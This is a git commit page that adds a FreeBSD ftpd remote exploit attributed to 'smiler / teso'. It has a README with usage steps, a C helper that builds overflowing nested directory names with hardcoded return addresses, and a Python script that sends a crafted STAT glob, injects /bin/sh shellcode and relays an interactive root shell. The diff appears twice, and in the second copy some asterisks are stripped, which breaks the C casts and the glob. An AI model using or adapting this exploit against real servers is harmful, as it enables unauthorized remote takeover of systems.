initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /exploits/ftpd_exp
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
3 files changed, 56 insertions, 0 deletions
diff --git a/exploits/ftpd_exp/README b/exploits/ftpd_exp/README
new file mode 100644
index 0000000..6a42370
--- /dev/null
+++ b/exploits/ftpd_exp/README
@@ -0,0 +1,5 @@
+Preliminary FreeBSD ftpd exploit by smiler / teso. Plz dont distribute outside
+teso. I'm sure there are better ways to do this...
+compile and run 'exp.c' on your homedir, and then run 'python exp.py' having
+altered it for your username and password. Offsets may need tweaking...
diff --git a/exploits/ftpd_exp/exp.c b/exploits/ftpd_exp/exp.c
new file mode 100644
index 0000000..5f80d44
--- /dev/null
+++ b/exploits/ftpd_exp/exp.c
@@ -0,0 +1,25 @@
+#include <stdio.h>
+#include <unistd.h>
+int
+main (int argc, char **argv)
+{
+        char    buf[512];
+        memset (buf, 'a', 255);
+        buf[255] = '\0';
+        if (mkdir (buf, 0700) < 0) {
+                perror ("mkdir");
+                return (-1);
+        }
+        chdir (buf);
+        mkdir (buf, 0700);
+        chdir (buf);
+        mkdir (buf, 0700);
+        chdir (buf);
+        *(unsigned int *)(buf + 156) = 0xbfbffa2d;
+        *(unsigned int *)(buf + 160) = 0xbfbff361;
+        *(unsigned int *)(buf + 164) = 0xbfbff361;
+        mkdir (buf, 0700);
+}
diff --git a/exploits/ftpd_exp/exp.py b/exploits/ftpd_exp/exp.py
new file mode 100644
index 0000000..86ec3cc
--- /dev/null
+++ b/exploits/ftpd_exp/exp.py
@@ -0,0 +1,26 @@
+#!/usr/bin/env python
+from ftplib import *
+import os,time,struct,sys
+from select import select
+shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a'
+ftp = FTP()
+ftp.connect('192.168.1.2',21)
+ftp.login('username','password')
+time.sleep(6)
+print 'sending stat command'
+ftp.putcmd('STAT a*/*/*/*/')
+print 'sending shellcode'
+ftp.sock.send(shellcode)
+time.sleep(2)
+while 1:
+        heh = select([sys.stdin,ftp.sock],[],[])
+        for i in heh[0]:
+                if i == sys.stdin:
+                        buf = sys.stdin.readline()
+                        ftp.sock.send(buf)
+                if i == ftp.sock:
+                        buf = ftp.sock.recv(1024)
+                        sys.stdout.write(buf)
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /exploits/ftpd_exp
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/exploits/ftpd_exp/README b/exploits/ftpd_exp/README new file mode 100644 index 0000000..6a42370 --- /dev/null +++ b/exploits/ftpd_exp/README
@@ -0,0 +1,5 @@
	1	Preliminary FreeBSD ftpd exploit by smiler / teso. Plz dont distribute outside
	2	teso. I'm sure there are better ways to do this...
	3
	4	compile and run 'exp.c' on your homedir, and then run 'python exp.py' having
	5	altered it for your username and password. Offsets may need tweaking...


diff --git a/exploits/ftpd_exp/exp.c b/exploits/ftpd_exp/exp.c new file mode 100644 index 0000000..5f80d44 --- /dev/null +++ b/exploits/ftpd_exp/exp.c
@@ -0,0 +1,25 @@
	1	#include <stdio.h>
	2	#include <unistd.h>
	3
	4	int
	5	main (int argc, char **argv)
	6	{
	7	char buf[512];
	8
	9	memset (buf, 'a', 255);
	10	buf[255] = '\0';
	11	if (mkdir (buf, 0700) < 0) {
	12	perror ("mkdir");
	13	return (-1);
	14	}
	15	chdir (buf);
	16	mkdir (buf, 0700);
	17	chdir (buf);
	18	mkdir (buf, 0700);
	19	chdir (buf);
	20	(unsigned int )(buf + 156) = 0xbfbffa2d;
	21	(unsigned int )(buf + 160) = 0xbfbff361;
	22	(unsigned int )(buf + 164) = 0xbfbff361;
	23	mkdir (buf, 0700);
	24
	25	}


diff --git a/exploits/ftpd_exp/exp.py b/exploits/ftpd_exp/exp.py new file mode 100644 index 0000000..86ec3cc --- /dev/null +++ b/exploits/ftpd_exp/exp.py
@@ -0,0 +1,26 @@
	1	#!/usr/bin/env python
	2	from ftplib import *
	3	import os,time,struct,sys
	4	from select import select
	5
	6	shellcode = '\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xc0\x50\x50\x50\xb0\x7f\xcd\x80\xeb\x17\x31\xc0\x5b\x50\x88\x43\x07\x8d\x4b\x08\x89\x5b\x08\x89\x43\x0c\x51\x53\x50\xb0\x3b\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh\x0a'
	7
	8	ftp = FTP()
	9	ftp.connect('192.168.1.2',21)
	10	ftp.login('username','password')
	11
	12	time.sleep(6)
	13	print 'sending stat command'
	14	ftp.putcmd('STAT a////')
	15	print 'sending shellcode'
	16	ftp.sock.send(shellcode)
	17	time.sleep(2)
	18	while 1:
	19	heh = select([sys.stdin,ftp.sock],[],[])
	20	for i in heh[0]:
	21	if i == sys.stdin:
	22	buf = sys.stdin.readline()
	23	ftp.sock.send(buf)
	24	if i == ftp.sock:
	25	buf = ftp.sock.recv(1024)
	26	sys.stdout.write(buf)